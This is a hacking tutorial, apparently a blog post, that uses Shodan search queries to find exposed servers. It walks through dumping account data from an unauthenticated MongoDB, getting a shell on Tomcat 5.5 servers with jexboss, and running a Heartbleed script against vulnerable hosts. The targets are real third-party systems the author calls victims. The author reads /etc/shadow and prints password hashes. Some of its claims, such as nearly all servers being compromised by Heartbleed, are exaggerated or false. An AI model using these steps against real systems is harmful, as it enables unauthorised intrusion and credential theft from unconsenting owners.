today we will touch on "SHODAN" in its Pentesting mode, using functional Exploits that will help them understand and audit vulnerable servers that exist.
first before going through the exploit methodology, we will have an "Extra" with a database manager "little known by some", but used by large & small servers.
source & more information:
as we know MongoDB is a DB system based on the Open source concept, but because such manager is in this POST.
In its web platform, shodan has several sections where we can interact with them, a clear example is "Databases":
https: //www.shodan .
We can see that it shows us known services such as "MySQL" and "PostgreSQL" named (The Oracle OpenSource).
Among others that we will use in this proof of concept "MongoDB", etc.
You can give "CLIP" to the mongoDB service Or simply use your "DORK" for a personalized search.
We can see in the image only shows "2" results, that if read well we have what is called "INFORMATION LEAK".
What is an information leak?
They are delicate or sensitive information data of a private service that is shown for human reasons or badly protected directories, but in their great majority there are services that show such data as it is MongoDB:
Database Name Size
zakey 49.8 GB
local 2.1 MB
admin 1 byte
We have: IP and the database that throws us directly, although we know that a server with credentials does not find more than a user panel, because in this search gives us sensitive data.
It's simple, because when searching for the MongoDB product, shodan begins to collect information from such a database manager, which has a poor security configuration.
How can we "access" vulnerable services?
good is simple, if you are in GNU you can install the mongoDB service as follows:
root@kali:~# apt-get install mongodb
once installed, we must activate the service as follows:
root@kali:~# service mongodb start
after activating the service, as you can see if it is activated, it is simple:
root@kali:~# service mongodb status
as we see in the picture our service is active, now how we connect to our victim.
In this proof of concept our victim will be:
Connecting to the server of our victim:
root@kali:~# mongo --host 220.127.116.11
as we see that we have connected to the server through the shell, now will teach the mongodb syntax process to interact in the database
> show dbs
- see all the database.
> use shop
- Choose the database to interact.
> show tables
- see tables in the database.
- Extract all the attributes of a table.
The first thing I did was to set up a database view of the server, later I chose the database called "shop", then run show tables to see all the tables that have and without doubt dumpie the data in the table "accounts" and I was able to obtain the attributes of said credential:
"name" : "email@example.com",
"email" : "firstname.lastname@example.org",
"password" : "$2a$07$342f56c383d6bd241ed54OLVQdfEDP3jZA.PiaO8BGP3yosLCevRy",
so you can edit all the attributes of the columns because you have all the necessary privileges, if you are the people who are bored writing everything in plain text syntax, you can install "Robomongo" - GUI to facilitate this process:
Exploiting an apache server by getting a SHELL through failure 5-5.
The bug has a long time to be discovered, a long time ago, in my case I would have chosen to do it for msfconsole but I was very lazy xD
since I would like to teach them how to audit an apache server to know if it is vulnerable or not, and exploit it in different ways, but I think that for more techniques that teach them, all that process can be optimized by the following exploit:
https : //github.com/joaomatosf/jexboss
root@kali:~# git clone https://github.com/joaomatosf/jexboss
- Finding vulnerable servers:
Server: Apache-Coyote / 1.1 Tomcat-5.5
In my case I chose this server :
If you want to use a custom search you can use the following dorks:
country: es " COUNTRY "
city: barcelona" CITY "
hostname: it is" DOMAIN "
you can make any country range you wish.
root@kali:~/tomcat# python jexboss.py -host http://18.104.22.168:8080/
as we see we have obtained a session by means of a shell, which we will do will verify that OS is running, for my part seeing that it is a Peruvian computer, I assumed it would be a windows server xD!haha
Let me make it clear, if the operating system is "WINDOWS" we must use #CMD command interpreters, in order to interact correctly with the server. ok
If it is a "GNU" system you can use the "uname -a" command to know the kernel you are using, but this exploit automatically detects and displays the kernel.
navigation very different an example to see the directories and what permissions we would have execute: ls -la.
if you want to obtain credentials of the user of the operating system we will use 2 commands:
Shell> cat /etc/passwd - sirve para verificar los usuarios que corren en diferentes servicios.
Shell> cat /etc/shadow -dumpear credenciales de servicios principales.
root: $ 6 $ 3cdgngze $ gafERX.OCPKvDAhgp9WyriAnR / iuDBZq6WjcZxe8BaFGga / Z5Zz1cCfj7aCxrrZB20RL3j6frbVBDzCZiCa9g0: 17107: 0: 99999: 7 :::
Well if you want to get the password you can do it by "brute force" or just running a meterpreter session by msfconsole and start dismantle the server, by a local Exploit.
It should be noted that the exploit has recently been updated, with the addition of more vulnerable services and a "BYPASS" on some WAFs. :)
Exploit heartbleak or heartbleed any fck
Undoubtedly one of the most dangerous BUG's worldwide, discovered in 2014,
Important companies worldwide were victims of attacks such as:
Youtube, Facebook, Google, Twitter, etc., 99.9% of servers worldwide were compromised back then.
We continue with some "Tips", although it is true some people have not exploited a server with the Open SSL vulnerability called Heartbleed.
If you want to find some of these vulnerable servers "SHODAN" offers an advanced search:
We have 141,927 results, so that they are experiencing this type of attack .
Once downloaded we extract it with the name of the folder "bleed", later we will go to enter that folder.
root@kali:~# python heartbleed.py 22.214.171.124
It would run this way, without the port for the simple fact of having the port by default
This host runs the service on port 8443:
Then we would run it this way :
root@kali:~# python heartbleed.py 126.96.36.199 8443
We exploited the server correctly capturing the traffic of live requests, this bug is feared because it captures the data traffic of requests of the web in its entirety, it is possible to say that if a large "organization" like facebook in 2014 million requests they did per minute, how many credentials were captured live.
Now imagine in millionaire companies like PayPal, Ebay, etc the headache they had at that time and the millions of dollars that were lost.
Lastly I do not want to do this POST too long with other methods, I hope I have helped them.
see u later mohamed ahmed